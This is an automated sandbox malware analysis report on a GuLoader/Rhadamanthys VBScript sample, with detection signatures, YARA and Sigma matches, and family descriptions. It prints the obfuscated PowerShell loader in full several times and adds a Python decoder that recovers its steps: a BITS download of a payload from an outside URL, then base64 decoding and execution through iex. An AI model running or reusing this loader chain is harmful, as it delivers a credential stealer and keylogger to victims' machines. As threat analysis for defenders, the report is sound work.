
Windows Analysis Report
F8HYX5HOgA.vbs

Overview

General Information

Sample name: F8HYX5HOgA.vbs (renamed because the original name is a hash value)
Original sample name: ace5b87a91d37f57a3288800b585268dbc4c1efde0417521f98b1fd4b86beff1.vbs
Analysis ID: 1578227
MD5: 85d4ef0ba65b5d677d8a3b3772542ea7
SHA1: b73d4b3d582213d2d350a86603f6a3b1d60cce03
SHA256: ace5b87a91d37f57a3288800b585268dbc4c1efde0417521f98b1fd4b86beff1
Tags: 185-236-228-92, 87-120-112-91, vbs, www-al-rasikh-com, user-JAMESWT_MHT

Detection

GuLoader, RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5444 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado 
OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf Reklaps1 Injuri}Oversate UnderwlTotalvgs TiresreErsalfa{SammenhSAlansbotFacettea Syphilr forerutPreulti-AncyroiSCassocklArbejdseSluicedeEarthsepAndenda Mlterrn1Kommena;SexagesFCirkusmu KonklunnonfinidContagimFrynsenoSheiladnsaltishgAttribu Moniti$Ventoseb Verniee LowerskGangliorHeteropaZoopatheFlettonfHoefligtMendelieJoshrou0Selvbet0Fotogra}Fagudda ');Fundmong (Krse ' Udledn$FarrisagGroteskl PresteoSkalperbValnddeaUnscrewl Piezom: FortalC LyderurKingleau BlockasparathyaStrandhdIntensioOlympiavHaandpaaMystacaeChasses7Irregja=Danefst(BinderiT RektoreCooreeus PaagretArtisko- LuftruPUnpropia Fodgngt DorylihKontakt Mathiah$OutmeasCTriartirUnasceruKnistensConjureaNormeridScriptuo BlgetrvPostlapaSlagsvre bookpr2 Overvr)Stakero ') ;}Fundmong (Krse 'estriat$GubbinsgEltonkllHermeneo BlidgrbDemissia SubjeklLuftala:AbrasaxGanuextraSkriveuzDisgusteFinansgnKristjap TaarnhaOpslmmerRegnskatThongdinBrneopd1Discolo7unaccus Agrgodk=Forvirr GradphoG 
PindsveKonkurrtDokefor-InterceCGrshoppo TilmelnScrapint DobbeleRadarovn Ingratt Begynd Tactin$VagarisCacidprorBisquesuSagtmodsBlaamusaCincinadGemmernoForhandvJeronymaAxolotle Bovnen2Overfie ');Fundmong (Krse 'Stagnin$DisseisgSpotligl KapninobaarebubHenfaldaHighflilMouthbr: PaastaOFortrylpToddlerdThiosula FriandtTrophieeOleoster FinaliiBrigadenUnacetigPalaeoc Brodni=Triolog Derover[BimanasS KokosbyAmyunnasPrototatPrologkeKvotastmFunctio.LskedriCTaabelioInsularnsudsingvpietisme TicklerWarnisstEnuncia] tuberc: Eyelet:AfvisesFSkriverrRespecioQuisquimOutactiBIntestia Runddes Rangore Starbl6Yachtie4uselskaSPignolitGodarterPaganisi DrawknnAdgangsgHeintje(Pursier$CalicosGCatenataContempzflercife kvidisnInsubdupHessianaIatroterJambedntUnconcenKongres1Statsli7Sceneme)Ruttera ');Fundmong (Krse 'trident$EksegetgBelivesldistriboUdspndtb PascalaHendecal Unquel:Medflgkb BilabieFodnotek Bobbysr Knappea AssocieBryologf PrivattEstopgeeFgtekaa2 Paavir Fiskekr=Daahind Inaugur[DecastcS knivmuyHalvlegs Scrawlt Subchoepositifm Kjrsga.PolymorToutliveeDialogix CloturtHepatot. PalamiE PhoebenOksefilc TekstkoAssessodMuseebai EmpighnUnscrapg Turist]valgret:Kylling:UnspeciAgluepotS SponsoCBombaziIFulviavIHmroege.FiberedGMetropoeEmulsoit ClavatSKneadmetVerbenarAphthoniMaaltidnAffiesvgTogfrer(Ekshibi$ProportOCodaspopvallisedTaenioiaMumacryt rammeve BrevskrCocompoi iviedmnRetsinsgMajuscu)Hylests ');Fundmong (Krse 'Reneger$Pickersgfllesanl misorgoOutchidbNedskriaMulticol Afhaar:ForsmdebAnnielleSubthrek HalogerBiofysiaStatsameCymlingflettiettPatienteinjuran3 samfun=Randrus$OvercrabAffaldseUtopistkrdviolerAutomata Hugsple PredoufKissemitEkstempeFodring2Tediums. UdviklsKameelsu decinobSkggedes AnfordtVenligtr JuveleiMisnumbnInstillgfrinumr(Talwars2Sgraffi7Sclerot2 Skjold2Nonsupp6Mormonb0Somatat,Planlgn2 Desill3 Rainin7 Anstan2Minilec9slidsni)Baragno ');Fundmong $bekraefte3;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4856 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado 
OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf Reklaps1 Injuri}Oversate UnderwlTotalvgs TiresreErsalfa{SammenhSAlansbotFacettea Syphilr forerutPreulti-AncyroiSCassocklArbejdseSluicedeEarthsepAndenda Mlterrn1Kommena;SexagesFCirkusmu KonklunnonfinidContagimFrynsenoSheiladnsaltishgAttribu Moniti$Ventoseb Verniee LowerskGangliorHeteropaZoopatheFlettonfHoefligtMendelieJoshrou0Selvbet0Fotogra}Fagudda ');Fundmong (Krse ' Udledn$FarrisagGroteskl PresteoSkalperbValnddeaUnscrewl Piezom: FortalC LyderurKingleau BlockasparathyaStrandhdIntensioOlympiavHaandpaaMystacaeChasses7Irregja=Danefst(BinderiT RektoreCooreeus PaagretArtisko- LuftruPUnpropia Fodgngt DorylihKontakt Mathiah$OutmeasCTriartirUnasceruKnistensConjureaNormeridScriptuo BlgetrvPostlapaSlagsvre bookpr2 Overvr)Stakero ') ;}Fundmong (Krse 'estriat$GubbinsgEltonkllHermeneo BlidgrbDemissia SubjeklLuftala:AbrasaxGanuextraSkriveuzDisgusteFinansgnKristjap TaarnhaOpslmmerRegnskatThongdinBrneopd1Discolo7unaccus Agrgodk=Forvirr GradphoG 
PindsveKonkurrtDokefor-InterceCGrshoppo TilmelnScrapint DobbeleRadarovn Ingratt Begynd Tactin$VagarisCacidprorBisquesuSagtmodsBlaamusaCincinadGemmernoForhandvJeronymaAxolotle Bovnen2Overfie ');Fundmong (Krse 'Stagnin$DisseisgSpotligl KapninobaarebubHenfaldaHighflilMouthbr: PaastaOFortrylpToddlerdThiosula FriandtTrophieeOleoster FinaliiBrigadenUnacetigPalaeoc Brodni=Triolog Derover[BimanasS KokosbyAmyunnasPrototatPrologkeKvotastmFunctio.LskedriCTaabelioInsularnsudsingvpietisme TicklerWarnisstEnuncia] tuberc: Eyelet:AfvisesFSkriverrRespecioQuisquimOutactiBIntestia Runddes Rangore Starbl6Yachtie4uselskaSPignolitGodarterPaganisi DrawknnAdgangsgHeintje(Pursier$CalicosGCatenataContempzflercife kvidisnInsubdupHessianaIatroterJambedntUnconcenKongres1Statsli7Sceneme)Ruttera ');Fundmong (Krse 'trident$EksegetgBelivesldistriboUdspndtb PascalaHendecal Unquel:Medflgkb BilabieFodnotek Bobbysr Knappea AssocieBryologf PrivattEstopgeeFgtekaa2 Paavir Fiskekr=Daahind Inaugur[DecastcS knivmuyHalvlegs Scrawlt Subchoepositifm Kjrsga.PolymorToutliveeDialogix CloturtHepatot. PalamiE PhoebenOksefilc TekstkoAssessodMuseebai EmpighnUnscrapg Turist]valgret:Kylling:UnspeciAgluepotS SponsoCBombaziIFulviavIHmroege.FiberedGMetropoeEmulsoit ClavatSKneadmetVerbenarAphthoniMaaltidnAffiesvgTogfrer(Ekshibi$ProportOCodaspopvallisedTaenioiaMumacryt rammeve BrevskrCocompoi iviedmnRetsinsgMajuscu)Hylests ');Fundmong (Krse 'Reneger$Pickersgfllesanl misorgoOutchidbNedskriaMulticol Afhaar:ForsmdebAnnielleSubthrek HalogerBiofysiaStatsameCymlingflettiettPatienteinjuran3 samfun=Randrus$OvercrabAffaldseUtopistkrdviolerAutomata Hugsple PredoufKissemitEkstempeFodring2Tediums. UdviklsKameelsu decinobSkggedes AnfordtVenligtr JuveleiMisnumbnInstillgfrinumr(Talwars2Sgraffi7Sclerot2 Skjold2Nonsupp6Mormonb0Somatat,Planlgn2 Desill3 Rainin7 Anstan2Minilec9slidsni)Baragno ');Fundmong $bekraefte3;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • wab.exe (PID: 2780 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • dialer.exe (PID: 1048 cmdline: "C:\Windows\system32\dialer.exe" MD5: E4BD77FB64DDE78F1A95ECE09F6A9B85)
  • svchost.exe (PID: 3712 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
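The powershell.exe command lines in the tree above are the GuLoader PowerShell stage. Every string literal is cover text: the helper Krse keeps one character out of every eight (index 7, 15, 23, ...) and never reads the last index, and Fundmong dot-sources whatever Krse returns through $bekraefte01, which decodes to iex. The Python below is an added example, not the sandbox's tooling and not the sample's code. It reimplements Krse, pulls every Krse '...' call out of an excerpt of the command line shown above (joined where the page wraps it) and decodes it, and then carves a second stage the way the last decoded statements do: base64-decode the downloaded file, take it as ASCII, and cut substring(272260, 23729) before it is handed to iex. The excerpt leaves out the $bekraefte00 assignment on purpose, because the rendered report appears to have collapsed a double space inside that literal, which shifts every pick after that point; decode that one from the raw sample. The demo blob used for the carving step is constructed here and is not the real Spej.ttf.

```python
import base64
import re


# Re-implementation of the sample's PowerShell helper "Krse" (added example):
#   For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ ... Substring($Holdk, 1) }
# i.e. keep every 8th character starting at index 7 and stop before the last index,
# so each cover string is a run of 8-character chunks whose final character is payload.
def krse(blob: str, start: int = 7, step: int = 8) -> str:
    return "".join(blob[i] for i in range(start, len(blob) - 1, step))


# Every obfuscated literal in the loader is passed as  Krse '<cover text>'  and the cover
# text never contains a single quote, so a plain regex is enough to pull them out.
KRSE_CALL = re.compile(r"Krse\s+'([^']*)'")


def decode_krse_calls(cmdline: str) -> list[str]:
    """Return the decoded value of each Krse '...' call, in order of appearance."""
    return [krse(cover) for cover in KRSE_CALL.findall(cmdline)]


# Stage-2 carving as done by the last decoded statements of the loader:
#   [Convert]::FromBase64String(<file>) -> ASCII.GetString -> .substring(272260,23729) -> iex
def carve_stage2(b64_text: str, offset: int, length: int) -> str:
    raw = base64.b64decode(b64_text)
    # .NET's ASCII decoder turns bytes >= 0x80 into '?'; mimic that instead of raising.
    text = raw.decode("ascii", errors="replace").replace("\ufffd", "?")
    return text[offset:offset + length]


# Constructed stand-in for the downloaded file: a base64 blob in which a short script sits
# exactly where the loader's substring() call looks. Everything around it is filler.
def build_demo_blob(stage2: str, offset: int = 272260, length: int = 23729) -> str:
    body = b"A" * offset + stage2.encode("ascii").ljust(length, b" ") + b"Z" * 512
    return base64.b64encode(body).decode("ascii")


# Excerpt of the powershell.exe command line from the process tree above, joined where the
# page wraps it; the $bekraefte00 assignment is omitted (see the note in the text).
SAMPLE_CMDLINE = r"""Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;"""


if __name__ == "__main__":
    for value in decode_krse_calls(SAMPLE_CMDLINE):
        print(repr(value))
    demo = carve_stage2(build_demo_blob("Write-Host stage2"), 272260, 23729)
    print(repr(demo.rstrip()))
```

Run against the excerpt, the decoder yields, in order: iex, Transferring, https://www.astenterprises.com.pk/ms/Spej.ttf, $global:Crusadovae2=$env:appdata and Import-Module BitsTransfer. Read with the rest of the command line, that is the whole loader: the omitted $bekraefte00 literal is a Start-BitsTransfer call from that URL to %APPDATA%\Notorhiza.Sal, the while loop polls the job until its JobState is no longer Transferring, and the tail reads the file, base64-decodes it, takes substring(272260, 23729) and passes it to iex. This is why the BITS service host (svchost.exe -k netsvcs -p -s BITS) appears in the tree and why the GET /ms/Spej.ttf request below carries the User-Agent "Microsoft BITS/7.8" rather than PowerShell's.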
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware and, as its name implies, it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
Source | Rule | Description | Author
00000009.00000003.2578876174.0000000005930000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000007.00000003.2571764775.0000000000A00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
00000009.00000003.2578561473.0000000005710000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
(12 entries in total; the remaining entries are not shown here)
Source | Rule | Description | Author
7.3.wab.exe.256f0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
9.3.dialer.exe.5930000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
9.3.dialer.exe.5710000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
7.3.wab.exe.254d0000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
Source | Rule | Description | Author
amsi32_4856.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Matched strings:
                    • 0xe0e0:$b2: ::FromBase64String(
                    • 0xcf00:$s1: -join
                    • 0x66ac:$s4: +=
                    • 0x676e:$s4: +=
                    • 0xa995:$s4: +=
                    • 0xcab2:$s4: +=
                    • 0xcd9c:$s4: +=
                    • 0xcee2:$s4: +=
                    • 0x15c1e:$s4: +=
                    • 0x15c9e:$s4: +=
                    • 0x15d64:$s4: +=
                    • 0x15de4:$s4: +=
                    • 0x15fba:$s4: +=
                    • 0x1603e:$s4: +=
                    • 0xd955:$e4: Get-WmiObject
                    • 0xdb44:$e4: Get-Process
                    • 0xdb9c:$e4: Start-Process
                    • 0x1475a:$e4: Get-Process

                    System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", ProcessId: 5444, ProcessName: wscript.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\system32\dialer.exe", CommandLine: "C:\Windows\system32\dialer.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\dialer.exe, NewProcessName: C:\Windows\SysWOW64\dialer.exe, OriginalFileName: C:\Windows\SysWOW64\dialer.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 2780, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\system32\dialer.exe", ProcessId: 1048, ProcessName: dialer.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", ProcessId: 5444, ProcessName: wscript.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 
